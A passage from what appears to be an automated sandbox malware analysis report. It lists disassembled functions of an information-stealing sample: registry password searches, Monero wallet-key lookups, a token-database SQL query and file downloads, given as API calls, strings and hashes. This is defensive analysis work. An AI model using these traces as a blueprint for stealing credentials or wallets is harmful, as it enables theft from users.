                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                    • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                    • API String ID: 3478931302-218353709
                                    • Opcode ID: 42c28410f474caba07b0ba29dbb139d3f4f18bdcc8c8cb878f04dbc4d2cf7f9d
                                    • Instruction ID: 346e5854b0a0100acfb57cad3ce32f419982c5c06e2243031ea4706fc4337f8d
                                    • Opcode Fuzzy Hash: 42c28410f474caba07b0ba29dbb139d3f4f18bdcc8c8cb878f04dbc4d2cf7f9d
                                    • Instruction Fuzzy Hash: 2D5144B1E5011897CB15FB60DC96FEE737CAF55300F404198B60A66093EF705B89DBA6
                                    Function 000875D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 000872D0: memset.MSVCRT ref: 00087314
                                      • Part of subcall function 000872D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0008733A
                                      • Part of subcall function 000872D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 000873B1
                                      • Part of subcall function 000872D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0008740D
                                      • Part of subcall function 000872D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00087452
                                      • Part of subcall function 000872D0: HeapFree.KERNEL32(00000000), ref: 00087459
                                    • lstrcat.KERNEL32(00000000,000A17FC), ref: 00087606
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00087648
                                    • lstrcat.KERNEL32(00000000, : ), ref: 0008765A
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 0008768F
                                    • lstrcat.KERNEL32(00000000,000A1804), ref: 000876A0
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000876D3
                                    • lstrcat.KERNEL32(00000000,000A1808), ref: 000876ED
                                    • task.LIBCPMTD ref: 000876FB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                    • String ID: :
                                    • API String ID: 3191641157-3653984579
                                    • Opcode ID: 3aac3d9d1c0fd4b1e3f60490b10f11a08ba02389b83427b4d16cb66a6f4d4b3f
                                    • Instruction ID: f1b78da2fe00a68bffe477996a34699a4cc7e176f4180562e60ca133a6cab00a
                                    • Opcode Fuzzy Hash: 3aac3d9d1c0fd4b1e3f60490b10f11a08ba02389b83427b4d16cb66a6f4d4b3f
                                    • Instruction Fuzzy Hash: 9431FA71900109DBCF08FBE8EC9DDFE7779BB48305B644118F106A7295DE34A946CB62
                                    Function 000872D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 00087314
                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0008733A
                                    • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 000873B1
                                    • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0008740D
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00087452
                                    • HeapFree.KERNEL32(00000000), ref: 00087459
                                    • task.LIBCPMTD ref: 00087555
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$EnumFreeOpenProcessValuememsettask
                                    • String ID: Password
                                    • API String ID: 2808661185-3434357891
                                    • Opcode ID: a26f2f49c62f6366de175d2a745e36abe7d4895c2db67f78a4499355481ad1ea
                                    • Instruction ID: 04de08661ed8a09ceef4d726763f3f7bbec2cfff06fe24cfaacd6d32ac6377b1
                                    • Opcode Fuzzy Hash: a26f2f49c62f6366de175d2a745e36abe7d4895c2db67f78a4499355481ad1ea
                                    • Instruction Fuzzy Hash: F5614AB580416C9BDB24EB50DC45FDAB7B8BF44304F1081E9E689A6146DBB09BC9CFA1
                                    Function 00098100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00D3F2C0,00000000,?,000A0E2C,00000000,?,00000000), ref: 00098130
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00098137
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00098158
                                    • __aulldiv.LIBCMT ref: 00098172
                                    • __aulldiv.LIBCMT ref: 00098180
                                    • wsprintfA.USER32 ref: 000981AC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                    • String ID: %d MB$@
                                    • API String ID: 2774356765-3474575989
                                    • Opcode ID: ceb41a6d2e9d040866573724c53306f5ce2c7618089f148583eae67f809dff09
                                    • Instruction ID: f9e66a1022051dcb55224c4ed900ce1e242ef5aff4c4a339a42aa46437d4597e
                                    • Opcode Fuzzy Hash: ceb41a6d2e9d040866573724c53306f5ce2c7618089f148583eae67f809dff09
                                    • Instruction Fuzzy Hash: 79215CB1E44208ABDF00DFD4DD4AFAEB7B8FB45B04F104209F605BB280C77869018BA5
                                    Function 000860A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                      • Part of subcall function 000847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00084839
                                      • Part of subcall function 000847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00084849
                                    • InternetOpenA.WININET(000A0DF7,00000001,00000000,00000000,00000000), ref: 0008610F
                                    • StrCmpCA.SHLWAPI(?,00D3FCE0), ref: 00086147
                                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0008618F
                                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 000861B3
                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 000861DC
                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0008620A
                                    • CloseHandle.KERNEL32(?,?,00000400), ref: 00086249
                                    • InternetCloseHandle.WININET(?), ref: 00086253
                                    • InternetCloseHandle.WININET(00000000), ref: 00086260
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2507841554-0
                                    • Opcode ID: ecc40172b3cf92a1284d21c04676cb898f536ec57118eaba6c73d0d083393c5a
                                    • Instruction ID: 39bc09f5b34554ab2756e51c4e466bcdd2727355e9761328b8acea57106f5164
                                    • Opcode Fuzzy Hash: ecc40172b3cf92a1284d21c04676cb898f536ec57118eaba6c73d0d083393c5a
                                    • Instruction Fuzzy Hash: 1B5161B1A00218ABDF20EF50DC49FEEB7B8FB44705F108098B645A72C1DB756A89CF95
                                    Function 0008BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                      • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D38988,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                      • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                      • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                      • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                      • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                      • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                      • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                    • lstrlen.KERNEL32(00000000), ref: 0008BC9F
                                      • Part of subcall function 00098E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00098E52
                                    • StrStrA.SHLWAPI(00000000,AccountId), ref: 0008BCCD
                                    • lstrlen.KERNEL32(00000000), ref: 0008BDA5
                                    • lstrlen.KERNEL32(00000000), ref: 0008BDB9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                    • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                    • API String ID: 3073930149-1079375795
                                    • Opcode ID: 1550926af4f867b03dfcefa438ef8b2cf2d8abfaf860d0dce5a864a5ebfdf470
                                    • Instruction ID: 3494c23ae03be3f28986ac5020bb7c588b66600e52d3c53d89c382a87fd93ea3
                                    • Opcode Fuzzy Hash: 1550926af4f867b03dfcefa438ef8b2cf2d8abfaf860d0dce5a864a5ebfdf470
                                    • Instruction Fuzzy Hash: DDB12072A10118ABDF04FBA0DD96EEE737CBF55300F504169F506A6092EF346A49DBE2
                                    Function 00096770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess$DefaultLangUser
                                    • String ID: *
                                    • API String ID: 1494266314-163128923
                                    • Opcode ID: 4a26df422eb18943bdad209cd03e689ba508a38e8915f44330b6a0f6024f9d34
                                    • Instruction ID: 298eba823dc7ca74481b7f2477490ca3f7f7a69f9112d580d867fda11bd53a47
                                    • Opcode Fuzzy Hash: 4a26df422eb18943bdad209cd03e689ba508a38e8915f44330b6a0f6024f9d34
                                    • Instruction Fuzzy Hash: C8F03A3090820DEFD7449FE0BD1DB6CFB70FB0470AF040199E60986290D6764A419B96
                                    Function 00084FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00084FCA
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00084FD1
                                    • InternetOpenA.WININET(000A0DDF,00000000,00000000,00000000,00000000), ref: 00084FEA
                                    • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00085011
                                    • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00085041
                                    • InternetCloseHandle.WININET(?), ref: 000850B9
                                    • InternetCloseHandle.WININET(?), ref: 000850C6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                    • String ID:
                                    • API String ID: 3066467675-0
                                    • Opcode ID: a46f9da14256259c293d7fe62ead09acbc7a8c52b320793a489af32475b95322
                                    • Instruction ID: fd424e37543ea0513a47bf13754611a08872d5eb00bf0a3224bfabc0ff6addeb
                                    • Opcode Fuzzy Hash: a46f9da14256259c293d7fe62ead09acbc7a8c52b320793a489af32475b95322
                                    • Instruction Fuzzy Hash: 3331F7B4A0021CABDB20DF54DC89BDDB7B4FB48709F5081D9EA09A7281D7706AC58F99
                                    Function 000983DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00098426
                                    • wsprintfA.USER32 ref: 00098459
                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0009847B
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0009848C
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00098499
                                      • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                    • RegQueryValueExA.ADVAPI32(00000000,00D3F278,00000000,000F003F,?,00000400), ref: 000984EC
                                    • lstrlen.KERNEL32(?), ref: 00098501
                                    • RegQueryValueExA.ADVAPI32(00000000,00D3F248,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,000A0B34), ref: 00098599
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00098608
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0009861A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                    • String ID: %s\%s
                                    • API String ID: 3896182533-4073750446
                                    • Opcode ID: 8181f026aa32424ba3eb091e8439ef0a827b98a58822ab00b8df2f9fe85323af
                                    • Instruction ID: d3e448c92bd64a8e7e9d4c4ccc6f03eae0e4b502a71defd288c1f88b4382608d
                                    • Opcode Fuzzy Hash: 8181f026aa32424ba3eb091e8439ef0a827b98a58822ab00b8df2f9fe85323af
                                    • Instruction Fuzzy Hash: 8E21EB7191021C9BDB64DB54DC85FE9B3B8FB48704F00C5D8E649A6240DF716A85CFD4
                                    Function 00097690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 000976A4
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000976AB
                                    • RegOpenKeyExA.ADVAPI32(80000002,00D2BDF0,00000000,00020119,00000000), ref: 000976DD
                                    • RegQueryValueExA.ADVAPI32(00000000,00D3F098,00000000,00000000,?,000000FF), ref: 000976FE
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00097708
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
